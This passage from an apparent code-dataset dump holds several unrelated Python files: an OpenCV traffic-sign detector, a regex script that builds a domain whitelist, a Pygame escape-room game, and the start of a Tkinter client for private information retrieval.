cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n # thickness=2)\n x, y = (749.75, 349.75)\n cv2.putText(sign_draw, \"*\", (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n thickness=2)\n 
show_img(\"lines\", sign_draw)\n\n centers = []\n\n for square in squares:\n \"\"\"\n get lines of same angle, get their mid points and the midpoint of these midpoints\n from the two groups, find mid-mid point\n \"\"\"\n\n # lines = [np.array(line) for line in list(square)]\n # side45 = filter_angles(lines, [45])\n # side_45 = filter_angles(lines, [-45])\n #\n # c = np.array([get_centers(side45), get_centers(side_45)])\n #\n # center = np.mean(c, axis=1)\n # centers.append(center)\n return centers\n\n\ndef proximal_pts(p1, p2, threshold):\n if (abs(p1[0] - p2[0]) < threshold and abs(p1[1] - p2[1]) < threshold):\n return True\n else:\n return False\n\n\ndef get_diamonds(lines):\n l45 = filter_angles(lines, [45])\n l_45 = filter_angles(lines, [-45])\n\n diamonds = []\n\n for l1 in l45:\n common = []\n p1 = (l1[0], l1[1])\n p2 = (l1[2], l1[3])\n for l2 in l_45:\n p3 = (l2[0], l2[1])\n p4 = (l2[2], l2[3])\n for pin1 in [p1, p2]:\n for pin2 in [p3, p4]:\n # print(\"{} {} {} {}\".format(pin1, pin2, abs(pin1[0]-pin2[0]), abs(pin1[1]-pin2[1])))\n if proximal_pts(pin1, pin2, 10):\n common = [(pin1[0] + pin2[0]) / 2, (pin1[1] + pin2[1]) / 2]\n placed = False\n l1t = tuple(l1)\n l2t = tuple(l2)\n ct = tuple(common)\n for diamond in diamonds:\n if l1t in diamond[\"lines\"] or l2t in diamond[\"lines\"]:\n diamond[\"lines\"].add(l1t)\n diamond[\"lines\"].add(l2t)\n diamond[\"common\"].add(ct)\n placed = True\n if not placed:\n diamond = {\"lines\": set([l1t, l2t]), \"common\": set({ct})}\n diamonds.append(diamond)\n return diamonds\n\n\ndef draw_circles(circles, img):\n for i in circles[0, :]:\n center = (i[0], i[1])\n # circle center\n cv2.circle(img, center, 1, (0, 100, 100), 3)\n # circle outline\n radius = i[2]\n cv2.circle(img, center, radius, (255, 0, 255), 3)\n\n\ndef pt_in_circle(c, r, p):\n if (c[0] - r < p[0] < c[0] + r) and (c[1] - r < p[1] < c[1] + r):\n return True\n return False\n\n\ndef get_lines_in_circles(lines, circles):\n linesIn = []\n for circle in circles:\n c = (circle[0], circle[1])\n r = circle[2]\n for line in lines:\n p1 = (line[0], line[1])\n p2 = (line[2], line[3])\n if pt_in_circle(c, r, p1) and pt_in_circle(c, r, p2):\n placed = False\n for l_pair in linesIn:\n if tuple(circle) == l_pair[\"cir\"]:\n l_pair[\"l\"].add(tuple(line))\n placed = True\n if not placed:\n linesIn.append({\"cir\": tuple(circle), \"l\": set({tuple(line)})})\n return linesIn\n\n\nsign = cv2.imread(\"input_images\\\\scene_stp_1.png\")\n# sign = cv2.imread(\"input_images\\\\scene_wrng_1.png\")\n\n# sign = cv2.imread(\"input_images\\\\scene_all_signs.png\")\nsign = cv2.imread(\"input_images\\\\test_images\\\\stop_249_149_blank.png\")\nsign_draw = copy.deepcopy(sign)\n# show_img(\"sample tl\", tl)\n\n# gray_img = cv2.cvtColor(sign, cv2.COLOR_BGR2GRAY)\n# blured = cv2.GaussianBlur(gray_img, (5,5),2)\n# edges_blur = cv2.Canny(blured, 5, 10)\n# show_img(\"blurred edges\", edges_blur)\n\n# check how canny edge filter shows up)\nedges = cv2.Canny(sign_draw, 100, 200)\nshow_img(\"edges of tl\", edges)\n\nlines = cv2.HoughLinesP(edges, rho=1, theta=np.pi / 36, threshold=20, minLineLength=5, maxLineGap=5)\nlines = lines.reshape(lines.shape[0], lines.shape[2])\n\nlengths = [5 * int(get_length(line) / 5) for line in lines]\nprint(sorted(lengths))\n\nlines = np.array([lines[i] for i in range(len(lines)) if 25 <= lengths[i] <= 40])\nprint(len(lines))\n\ni = 0\nfor line in lines:\n if 40 >= 5 * int(get_length(line) / 5) >= 25 or lengths[i] == 995:\n i += 1\n cv2.line(sign_draw, (line[0], line[1]), (line[2], line[3]), 
(0, 0, 0), 2)\nshow_img(\"\", sign_draw)\n\nlinesS = filter_angles(lines, [0, 90])\nlinesA = filter_angles(lines, [45, -45])\n\nlinesV = filter_angles(lines, [90])\nlinesH = filter_angles(lines, [0])\nlinesP = filter_angles(lines, [45])\nlinesN = filter_angles(lines, [-45])\n\nprint(linesS)\nprint(linesA)\n\noctagons = []\n\nfor l1 in linesS:\n p1 = (l1[0], l1[1])\n p2 = (l1[2], l1[3])\n for l2 in linesA:\n p3 = (l2[0], l2[1])\n p4 = (l2[2], l2[3])\n for pin1 in [p1, p2]:\n for pin2 in [p3, p4]:\n # print(\"{} {} {} {}\".format(pin1, pin2, abs(pin1[0]-pin2[0]), abs(pin1[1]-pin2[1])))\n if proximal_pts(pin1, pin2, 10):\n common = [int((pin1[0] + pin2[0]) / 2), int((pin1[1] + pin2[1]) / 2)]\n placed = False\n l1t = tuple(l1)\n l2t = tuple(l2)\n ct = tuple(common)\n l1end = p2 if pin1 == p1 else p1\n l2end = p4 if pin2 == p3 else p3\n for octagon in octagons:\n if l1t in octagon[\"lines\"] or l2t in octagon[\"lines\"]:\n octagon[\"lines\"].add(l1t)\n octagon[\"lines\"].add(l2t)\n octagon[\"common\"].add(ct)\n octagon[\"common\"].add(l1end)\n octagon[\"common\"].add(l2end)\n placed = True\n if not placed:\n octagon = {\"lines\": set([l1t, l2t]), \"common\": set({ct, l1end, l2end})}\n octagons.append(octagon)\n\nfo = {\"lines\": set(), \"common\": set()}\nfor o in octagons:\n if len(o[\"lines\"]) >= 3:\n fo[\"lines\"] = fo[\"lines\"].union(o[\"lines\"])\n fo[\"common\"] = fo[\"common\"].union(o[\"common\"])\nprint(len(fo[\"lines\"]))\n\npoints = list(fo[\"common\"])\npd = list([0 for i in range(len(fo[\"common\"]))])\n\nfor i in range(len(points)):\n distances = [proximal_pts(points[i], pt, 15) for pt in points]\n distances[i] = False\n cx = points[i][0]\n cy = points[i][1]\n cx = np.mean([points[i][0] for i in range(len(points)) if distances[i]])\n for j in range(i + 1, len(distances)):\n if pd[j] == 0 and distances[j]:\n pd[j] = 1\nprint(pd)\n\ncenterx = int(np.mean([points[i][0] for i in range(len(points)) if pd[i] == 0]))\ncentery = int(np.mean([points[i][1] for i in range(len(points)) if pd[i] == 0]))\n\narea = sign_draw[centery - 5:centery + 5, centerx - 5:centerx + 5]\nred = np.mean(area[:, :, 2])\ngreen = np.mean(area[:, :, 1])\nblue = np.mean(area[:, :, 0])\nif red > 200:\n print(\"finally!!\")\n\ncv2.putText(sign_draw, \"*\", (int(centerx), int(centery)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), thickness=2)\n\nprint(points)\nfor i in range(len(points)):\n if pd[i] == 0:\n cv2.putText(sign_draw, \"*\", (int(points[i][0]), int(points[i][1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0),\n thickness=2)\nshow_img(\"\", sign_draw)\n\n\"\"\"\nfor each point, calculate the distance with each point in the array \nremove the points from array which have distance with the point < 15\n\"\"\"\n\n# for o in octagons:\n# print(\"lines: {} \\n common: {}\".format(o[\"lines\"], o[\"common\"]))\n# for point in o[\"common\"]:\n# cv2.putText(sign_draw, \"*\", (int(point[0]), int(point[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0),\n# thickness=2)\n# show_img(\"\",sign_draw)\n\n# oct2 = copy.deepcopy(octagons)\n\n\n# final_octagons = []\n# inter = [set({}) for i in range(len(octagons))]\n#\n# for i in range(len(octagons)):\n# for j in range(i+1, len(octagons)):\n# if octagons[i][\"lines\"].intersection(octagons[j][\"lines\"]) != set():\n# inter[i].add(j)\n#\n# oc = copy.deepcopy(octagons)\n# print(oc)\n# for i in range(len(inter)-1, -1, -1):\n# new_set = octagons[i]\n# dependents = list(inter[i])\n# dependents.sort()\n# for j in range(len(dependents)-1,-1,-1):\n# if dependents[j] >= len(octagons):\n# continue\n# 
old = octagons[dependents[j]]\n# new_set[\"lines\"] = new_set[\"lines\"].union(old[\"lines\"])\n# new_set[\"common\"] = new_set[\"common\"].union(old[\"common\"])\n# octagons.pop(j)\n# octagons[i] = new_set\n# final_octagons.append(new_set)\n#\n#\n# for o in octagons:\n# print(\"lines: {} \\n common: {}\".format(o[\"lines\"], o[\"common\"]))\n# for point in o[\"common\"]:\n# cv2.putText(sign_draw, \"*\", (int(point[0]), int(point[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0),\n# thickness=2)\n# show_img(\"\",sign_draw)\n\n\n# for o1 in octagons:\n# for o2 in octagons:\n# if o1[\"lines\"].intersection(o2[\"lines\"]) != set():\n#\n\n# print(len(lines))\n#\n# i=0\n# for line in lines:\n# if 40 >= 5*int(get_length(line)/5) >= 25:\n# i+=1\n# cv2.line(sign_draw, (line[0], line[1]), (line[2], line[3]), (0,0,0), 2)\n# show_img(\"\",sign_draw)\n\n\n\"\"\"\n# for line in lines:\n# cv2.line(sign_draw, (line[0], line[1]), (line[2], line[3]), (0,0,0), 2)\n\nlinesS = filter_angles(lines, [0,90])\nlinesA = filter_angles(lines, [45, -45])\n\nlinesV = filter_angles(lines, [90])\nlinesH = filter_angles(lines, [0])\nlinesP = filter_angles(lines, [45])\nlinesN = filter_angles(lines, [-45])\n\n# print(linesV)\n# print(linesH)\n# print(linesP)\n# print(linesN)\n\noctagons = []\n\nfor lV in linesV:\n p1 = (lV[0], lV[1])\n p2 = (lV[2], lV[3])\n for lP in linesP:\n p3 = (lP[0], lP[1])\n p4 = (lP[2], lP[3])\n if abs(get_length(lV) - get_length(lP)) <10:\n for lH in linesH:\n p5 = (lH[0], lH[1])\n p6 = (lH[2], lH[3])\n if abs(get_length(lH) - get_length(lP)) < 10:\n for pin1 in [p1, p2]:\n for pin2 in [p3,p4]:\n for pin3 in [p5,p6]:\n cv2.line(sign_draw, pin1, pin2, (0,0,0), 2)\n cv2.line(sign_draw, pin2, pin3, (0, 0, 0), 2)\n show_img(\"\", sign_draw)\n if proximal_pts(pin1, pin2, 10) and abs(get_length(lV) - get_length(lP)) <10:\n print(\"I am V- P \")\n common = [int((pin1[0] + pin2[0]) / 2), int((pin1[1] + pin2[1]) / 2)]\n placed = False\n lVt = tuple(lV)\n lPt = tuple(lP)\n ct = tuple(common)\n for o in octagons:\n if lVt in o[\"lines\"] or lPt in o[\"lines\"]:\n o[\"lines\"].add(lVt)\n o[\"lines\"].add(lPt)\n o[\"common\"].add(ct)\n placed = True\n if not placed:\n o = {\"lines\":set({lVt, lPt}), \"common\":set({ct})}\n if proximal_pts(pin2, pin3, 10) and abs(get_length(lH) - get_length(lP)) <10:\n print(\"I am P - H\")\n common = [int((pin2[0] + pin3[0]) / 2), int((pin2[1] + pin3[1]) / 2)]\n placed = False\n lHt = tuple(lH)\n lPt = tuple(lP)\n ct = tuple(common)\n for o in octagons:\n if lHt in o[\"lines\"] or lPt in o[\"lines\"]:\n o[\"lines\"].add(lHt)\n o[\"lines\"].add(lPt)\n o[\"common\"].add(ct)\n placed = True\n if not placed:\n o = {\"lines\":set({lHt, lPt}), \"common\":set({ct})}\n octagons.append(o)\n\n #points of lH and lV will be the last ones.\n\n\"\"\"\n\n# for l1 in linesS:\n# p1 = (l1[0], l1[1])\n# p2 = (l1[2], l1[3])\n# for l2 in linesA:\n# p3 = (l2[0], l2[1])\n# p4 = (l2[2], l2[3])\n# for pin1 in [p1, p2]:\n# for pin2 in [p3, p4]:\n# # print(\"{} {} {} {}\".format(pin1, pin2, abs(pin1[0]-pin2[0]), abs(pin1[1]-pin2[1])))\n# if proximal_pts(pin1, pin2, 10) and abs(get_length(l1)-get_length(l2)) < 10:\n# common = [(pin1[0] + pin2[0]) / 2, (pin1[1] + pin2[1]) / 2]\n# placed = False\n# l1t = tuple(l1)\n# l2t = tuple(l2)\n# ct = tuple(common)\n# for octagon in octagons:\n# if l1t in octagon[\"lines\"] or l2t in octagon[\"lines\"]:\n# octagon[\"lines\"].add(l1t)\n# octagon[\"lines\"].add(l2t)\n# octagon[\"common\"].add(ct)\n# placed = True\n# if not placed:\n# octagon = {\"lines\": set([l1t, l2t]), 
\"common\": set({ct})}\n# octagons.append(octagon)\n\"\"\"\nprint(len(octagons))\n\nfor o in octagons:\n print(\"lines: {} \\n common: {}\".format(o[\"lines\"], o[\"common\"]))\n for point in o[\"common\"]:\n cv2.putText(sign_draw, \"*\", (int(point[0]), int(point[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,0),\n thickness=2)\n show_img(\"\",sign_draw)\n\nFor Do Not Enter signs\ncircles = cv2.HoughCircles(edges, cv2.HOUGH_GRADIENT, 1, 20,\n param1=15, param2=20,\n minRadius=5, maxRadius=50)\nif circles is None: exit() # should become return 0, 0\n\ncircles = np.uint16(np.around(circles))\ncshape = circles.shape\ncenters = circles.reshape(cshape[1], cshape[2])\n\n\n# will get circles with lines inside of it\nlinesIn = get_lines_in_circles(lines, centers)\n\nfor l_pair in linesIn:\n circle = np.array(l_pair[\"cir\"])\n r = (circle[2] / 2).astype(int)\n red = np.mean(sign_draw[circle[1] - r:circle[1] + r,\n circle[0] - r:circle[0] + r,\n 2])\n # check circle color\n if red > 200:\n c = (circle[0], circle[1])\n area = sign_draw[c[1]-5:c[1]+5, c[0]-5:c[0]+5]\n red = np.mean(area[:, :, 2])\n green = np.mean(area[:, :, 1])\n blue = np.mean(area[:, :, 0])\n if red > 200 and blue > 200 and green > 200:\n print(\"{} {}\".format(int(c[0]), int(c[1])))\n cv2.putText(sign_draw, \"*\", (int(c[0]), int(c[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n thickness=2)\n show_img(\"sign\",sign_draw)\n\n\n#show_img(\"lines and circles\", sign_draw)\n# if circles is not None:\n# circles = np.uint16(np.around(circles))\n# draw_circles(circles, sign_draw)\n# show_img(\"lines and circles\", sign_draw)\n\n\"\"\"\n\n\"\"\"for construction and warning\n# for diamond in diamonds:\n# print(\"lines: {} \\n common: {}\".format(diamond[\"lines\"], diamond[\"common\"]))\n# for point in diamond[\"common\"]:\n# cv2.putText(sign_draw, \"*\", (int(point[0]), int(point[1])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n# thickness=2)\n# show_img(\"\",sign_draw)\n# diamonds = get_diamonds(lines)\n#\n# for diamond in diamonds:\n# centerx = np.mean([c[0] for c in diamond[\"common\"]])\n# centery = np.mean([c[1] for c in diamond[\"common\"]])\n# area = sign_draw[int(centery) - 5:int(centery) + 5, int(centerx) - 5:int(centerx) + 5]\n# red = np.mean(area[:, :, 2])\n# green = np.mean(area[:, :, 1])\n# print(\"{} {}\".format(red, green))\n# if red > 200 and green > 200:\n# print(\"warning\")\n# cv2.putText(sign_draw, \"* warning\", (int(centerx), int(centery)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255),\n# thickness=2)\n# show_img(\"\", sign_draw)\n\n\n# centers = get_square_centers(lines)\n#\n# for center in centers:\n# area = sign_draw[int(center[0])-5:int(center[0])+5, int(center[1])-5:int(center[1]) +5]\n# red = np.mean(area[:,:,2])\n# green = np.mean(area[:,:,1])\n# cv2.putText(sign_draw, \"*\", (int(center[1]),int(center[0])), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), thickness=2)\n# show_img(\"sign\",sign_draw)\n# print(red)\n# print(green)\n# if red > 200 and green > 200:\n# print(\"warning\")\n#\n#\n# print(centers)\n# #print(\"{} {}\".format(x,y))\n\n#draw_tl_center(sign_draw, (x,y), \"yield\")\n# show_img(\"warning\", sign_draw)\n\"\"\"\n\ncv2.destroyAllWindows()\n","sub_path":"ps02/playing_signs.py","file_name":"playing_signs.py","file_ext":"py","file_size_in_byte":21082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"70368114","text":"# _*_ coding=utf-8 _*_\n\nimport re\nimport 
os,sys\n\nprojectPath=os.getcwd()\n\n\nf=open(projectPath+\"/white_list/result.txt\",'r')\nL=[]\nwith open(projectPath+\"/white_list/white_list.txt\",\n 'w') as g:\n for i in f.readlines():\n j=i.strip('\\r\\n')\n l2=re.search('[0-9A-Za-z]+\\.[0-9A-Za-z]+\\.[0-9A-Za-z]+', j)\n l3 = re.search('[0-9A-Za-z]+\\.[0-9A-Za-z]+', j)\n l1 = re.search('[0-9A-Za-z]+\\.[0-9A-Za-z]+\\.[0-9A-Za-z]+\\.[0-9A-Za-z]+', j)\n if l1 :\n print(l1.group())\n\n L.append(l1)\n elif l2:\n print(l2.group())\n\n L.append(l2)\n elif l3:\n print(l3.group())\n L.append(l3)\n else:\n print(\"no urls\")\n for l in L:\n\n url=l.group(0)\n\n url=re.sub('www.','',url)\n g.write(url+'\\n')\n\nf.close()","sub_path":"com-fj-phishing-2/white_list/Qingxi.py","file_name":"Qingxi.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"27351433","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 14 10:28:40 2019\n\n@author: Pedro Ball\n\"\"\"\n\n# Importando as bibliotecas necessárias.\nimport pygame\nfrom os import path\n\n# Estabelece a pasta que contem as figuras.\nimg_dir = path.join(path.dirname(__file__), 'img')\n\n# Dados gerais do jogo.\nWIDTH = 480 # Largura da tela\nHEIGHT = 450 # Altura da tela\nFPS = 60 # Frames por segundo\n\n# Define algumas variáveis com as cores básicas\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\n\n# Classe Jogador que representa a nave\nclass Mochila(pygame.sprite.Sprite):\n \n # Construtor da classe.\n def __init__(self):\n \n # Construtor da classe pai (Sprite).\n pygame.sprite.Sprite.__init__(self)\n \n # Carregando a imagem de fundo.\n mochila = pygame.image.load(path.join(img_dir, \"inventario.png\")).convert()\n self.image = mochila\n \n # Diminuindo o tamanho da imagem.\n self.image = pygame.transform.scale(mochila, (50, 38))\n \n # Deixando transparente.\n self.image.set_colorkey(BLACK)\n \n # Detalhes sobre o posicionamento.\n self.rect = self.image.get_rect()\n \n # Centraliza embaixo da tela.\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 10\n\n# Classe Jogador que representa a seta\nclass Seta(pygame.sprite.Sprite):\n \n # Construtor da classe.\n def __init__(self):\n \n # Construtor da classe pai (Sprite).\n pygame.sprite.Sprite.__init__(self)\n \n # Carregando a imagem de fundo.\n seta = pygame.image.load(path.join(img_dir, \"SETA.png\")).convert()\n self.image = seta\n \n # Diminuindo o tamanho da imagem.\n self.image = pygame.transform.scale(seta, (50, 38))\n \n # Deixando transparente.\n self.image.set_colorkey(BLACK)\n \n # Detalhes sobre o posicionamento.\n self.rect = self.image.get_rect()\n \n # Centraliza embaixo da tela.\n self.rect.centerx = WIDTH - 40\n self.rect.bottom = HEIGHT - 400\n \nimg_local = \"\"\n\ndef load_assets(img_dir):\n assets = {}\n assets[\"Inicio\"] = pygame.image.load(path.join(img_dir, \"inicio.png\")).convert()\n assets[\"Quarto\"] = pygame.image.load(path.join(img_dir, \"quarto.png\")).convert()\n assets[\"Cama\"] = pygame.image.load(path.join(img_dir, \"cama.png\")).convert()\n assets[\"Recompensa\"] = pygame.image.load(path.join(img_dir,\"recompensa_1.png\")).convert()\n# assets[\"Inferno\"] = pygame.image.load(path.join(img_dir, \"inferno\"))\n assets[\"Inventario\"] = pygame.image.load(path.join(img_dir,\"inventario_0.png\"))\n if img_local == \"Cama\":\n assets[\"Inventario\"] = pygame.image.load(path.join(img_dir,\"inventario_1.png\"))\n return 
assets\n\ndef load_inventario(img_dir):\n inventory = {}\n inventory[\"Água Benta\"]\n\n# Inicialização do Pygame.\npygame.init()\npygame.mixer.init()\n\n# Tamanho da tela.\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\n# Nome do jogo\npygame.display.set_caption(\"Doom Escape\")\n\n# Variável para o ajuste de velocidade\nclock = pygame.time.Clock()\n\n# Carrega o fundo do jogo\nimg_dic = load_assets(img_dir)\n\n\n# Cria uma nave. O construtor será chamado automaticamente.\nmochila = Mochila()\nseta = Seta()\n# Cria um grupo de sprites e adiciona a nave.\nall_sprites = pygame.sprite.Group()\nall_sprites.add(mochila)\nall_sprites.add(seta)\n\n# Comando para evitar travamentos.\nimg_local = \"Inicio\"\nimg_local_0 = \"\"\n\n\ntry:\n \n # Loop principal.\n running = True\n while running:\n \n # Ajusta a velocidade do jogo.\n clock.tick(FPS)\n \n # Processa os eventos (mouse, teclado, botão, etc).\n for event in pygame.event.get():\n \n # Verifica se foi fechado\n if event.type == pygame.QUIT:\n running = False\n\n elif img_local == \"Inicio\":\n if event.type == pygame.MOUSEBUTTONDOWN:\n px = event.pos[0]\n py = event.pos[1]\n if px > 0 and px < 480 and py > 0 and py < 450:\n img_local = \"Quarto\"\n if px > 220 and px < 259 and py > 406 and py < 440:\n img_local_0 = \"Inicio\"\n img_local = \"Inventario\"\n \n elif img_local == \"Quarto\": \n if event.type == pygame.MOUSEBUTTONDOWN:\n px = event.pos[0]\n py = event.pos[1]\n if px > 70 and px < 310 and py > 270 and py < 370:\n img_local = \"Cama\"\n if px > 387 and px < 449 and py > 244 and py < 270:\n img_local = \"Recompensa\"\n img_local_0 = \"\"\n if px > 220 and px < 259 and py > 406 and py < 440:\n img_local_0 = \"Quarto\"\n img_local = \"Inventario\"\n elif img_local == \"Cama\":\n if event.type == pygame.MOUSEBUTTONDOWN:\n px = event.pos[0]\n py = event.pos[1]\n if px > 220 and px < 259 and py > 406 and py < 440:\n img_local_0 = \"Cama\"\n img_local = \"Inventario\"\n \n elif img_local == \"Inventario\":\n if event.type == pygame.MOUSEBUTTONDOWN:\n px = event.pos[0]\n py = event.pos[1]\n if px > 220 and px < 259 and py > 406 and py < 440:\n img_local = img_local_0\n \n # A cada loop, redesenha o fundo e os sprites\n screen.fill(BLACK)\n reindera_imagem = pygame.transform.scale(img_dic[img_local], (480, 450))\n screen.blit(reindera_imagem, img_dic[img_local].get_rect())\n #screen.blit(img_dic[\"Inventario\"], img_dic[\"Inventario\"].get_rect())\n all_sprites.draw(screen)\n \n # Depois de desenhar tudo, inverte o display.\n pygame.display.flip()\n \nfinally:\n pygame.quit()","sub_path":"Desenvolvimento e Tentativas/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"48044627","text":"# import socket\r\n# import random\r\n# \r\n# def client(string):\r\n# HOST, PORT = 'localhost', 31100\r\n# # SOCK_STREAM == a TCP socket\r\n# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n# #sock.setblocking(0) # optional non-blocking\r\n# sock.connect((HOST, PORT))\r\n# \r\n# self.logger.info (\"sending data => [%s]\" % (string))\r\n# \r\n# sock.send(bytes(string, \"utf-8\"))\r\n# reply = sock.recv(16384) # limit reply to 16K\r\n# self.logger.info (\"reply => \\n [%s]\" % (reply))\r\n# sock.close()\r\n# return reply\r\n# \r\n# def main():\r\n# client('Python Rocks')\r\n# \r\n# if __name__ == \"__main__\":\r\n# main()\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom threading import RLock\r\nfrom 
queue import Queue\r\nfrom threading import Thread\r\nfrom PIL import ImageTk\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport math\r\nfrom PIRQueryObject import PIRQueryObject\r\n\r\n'''''\r\nhttp://python.about.com/od/python30/ss/30_strings_3.htm\r\n'''''\r\nimport logging\r\nimport threading\r\nimport socket\r\nfrom FrameBuilder import FrameBuilder\r\nfrom time import sleep\r\nfrom OpCodes import OpCodes\r\nimport binascii\r\nimport random\r\nfrom bitstring import BitArray\r\nimport time\r\nfrom Crypto import Random\r\nfrom Crypto.Cipher import AES\r\nfrom sys import byteorder\r\nimport random\r\nfrom itertools import count\r\nfrom tkinter import messagebox\r\nimport pickle \r\n\r\ncodes = OpCodes()\r\nS_M_PORT = 31100\r\nactive_servers = {}\r\nserversPool = Queue()\r\nserversQueryReply = list()\r\nSEED_LENGTH = 128\r\nclass client_window(Frame):\r\n \r\n \r\n pirClient = None\r\n \r\n def __init__(self, parent):\r\n logging.basicConfig(level=logging.DEBUG,format='%(name)s: %(message)s',)\r\n self.logger = logging.getLogger(\"Client Window\")\r\n \r\n \r\n \r\n #################### Global variables ####################\r\n \r\n self.DB_LENGTH = 500\r\n self.queryMethod=IntVar()\r\n self.desirableBit=0\r\n self.myParent = parent \r\n \r\n self.myParent.title('PIR Client')\r\n self.masterFrame = ttk.Frame(self.myParent,padding=(0,10,0,5)) ###\r\n self.masterFrame.grid(column=0, row=0, sticky=(N, S, E, W))\r\n \r\n self.pirClient = PIRClient(self)\r\n \r\n #------ constants for controlling layout ------\r\n button_width = 12 ### (1)\r\n button_height = 3\r\n \r\n button_padx = \"2\" ### (2)\r\n button_pady = \"1\" ### (2)\r\n\r\n buttons_frame_padx = \"3\" ### (3)\r\n buttons_frame_pady = \"3\" ### (3) \r\n buttons_frame_ipadx = \"3\" ### (3)\r\n buttons_frame_ipady = \"3\" ### (3)\r\n # -------------- end constants ----------------\r\n\r\n self.style = ttk.Style(self.myParent)\r\n self.style.configure('TButton', font=(\"Arial\", 8,'bold'))#larger Font for buttons\r\n self.style.configure('TLabel', font=(\"Arial\", 10,'bold'))#larger Font for buttons\r\n \r\n self.icn_SM_disconnected = ImageTk.PhotoImage(file=\"icons/Red-icon32.png\")\r\n self.icn_SM_connected = ImageTk.PhotoImage(file=\"icons/Green-icon32.png\")\r\n self.icn_compare = ImageTk.PhotoImage(file=\"icons/compare24.png\")\r\n self.icn_query = ImageTk.PhotoImage(file=\"icons/download24.png\")\r\n self.icn_exit = ImageTk.PhotoImage(file=\"icons/exit24.png\")\r\n\r\n self.lbl_SMAddress = ttk.Label(self.masterFrame, compound=LEFT, style='TLabel', text=\"Server manager address: \" )\r\n self.lbl_SMAddress.grid(row=0,column=0, columnspan=2, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n\r\n self.txt_SMAddress = ttk.Entry(self.masterFrame, justify=CENTER, width=button_width)\r\n self.txt_SMAddress.insert(0, '192.168.4.1')\r\n self.txt_SMAddress.grid(row=0,column=7, columnspan=1, rowspan=1, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(E))\r\n \r\n# self.lbl_padding = ttk.Label(self.masterFrame, compound=LEFT)\r\n# self.lbl_padding.grid(row=0,column=3, columnspan=3, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n# \r\n self.btn_connect = ttk.Button(self.masterFrame, compound=RIGHT, command=self.clickConnect, style='TButton', text=\"Connect \",width=button_width )\r\n self.btn_connect.grid(row=2,column=0, ipadx=button_padx, ipady=button_pady, 
padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n \r\n self.lbl_connectionSts = Label(self.masterFrame, image=self.icn_SM_disconnected)\r\n self.lbl_connectionSts.grid(row=2, column=7, sticky=(E))\r\n \r\n self.chk_pir = ttk.Radiobutton(self.masterFrame, text='PIR', variable=self.queryMethod, value=1)\r\n self.chk_pir.grid(row=3,column=0,columnspan=2, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W, S))\r\n self.chk_pir.state(['selected'])\r\n self.queryMethod.set(1)\r\n \r\n self.chk_regular = ttk.Radiobutton(self.masterFrame, text='Standard', variable=self.queryMethod, value=2)\r\n self.chk_regular.grid(row=4,column=0,columnspan=2, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W, S))\r\n \r\n self.scl_bitChoice = ttk.Scale(self.masterFrame, orient=HORIZONTAL, from_=0.0, to=self.DB_LENGTH,command=self.updatDesiedBit)\r\n self.scl_bitChoice.grid(row=5, column=0, columnspan=8, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady,sticky=(W,E))\r\n self.scl_bitChoice.state([\"disabled\"]) # Disable the scale bar.\r\n \r\n self.lbl_bitIndex = ttk.Label(self.masterFrame, compound=CENTER, style='TLabel' , text = '0')\r\n self.lbl_bitIndex.grid(row=6,column=1, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W,E))\r\n \r\n \r\n self.btn_query = ttk.Button(self.masterFrame, compound=RIGHT, command=self.clickQuery, style='TButton', text=\"Get value \",image=self.icn_query, width=button_width )\r\n self.btn_query.grid(row=7,column=0, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n \r\n self.lbl_result = ttk.Label(self.masterFrame, compound=CENTER, style='TLabel', text='XX',justify=LEFT)\r\n self.lbl_result.grid(row=7,column=7, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(E))\r\n \r\n \r\n self.btn_compare = ttk.Button(self.masterFrame, compound=RIGHT, command=self.clickCompare, style='TButton', text=\"Compare \", image=self.icn_compare, width=button_width )\r\n self.btn_compare.grid(row=8,column=0, ipadx=button_padx, ipady=button_pady, padx=buttons_frame_padx, pady=buttons_frame_ipady, sticky=(W))\r\n \r\n self.btn_exit = ttk.Button(self.masterFrame, compound=RIGHT, command=self.clickExit, style='TButton', 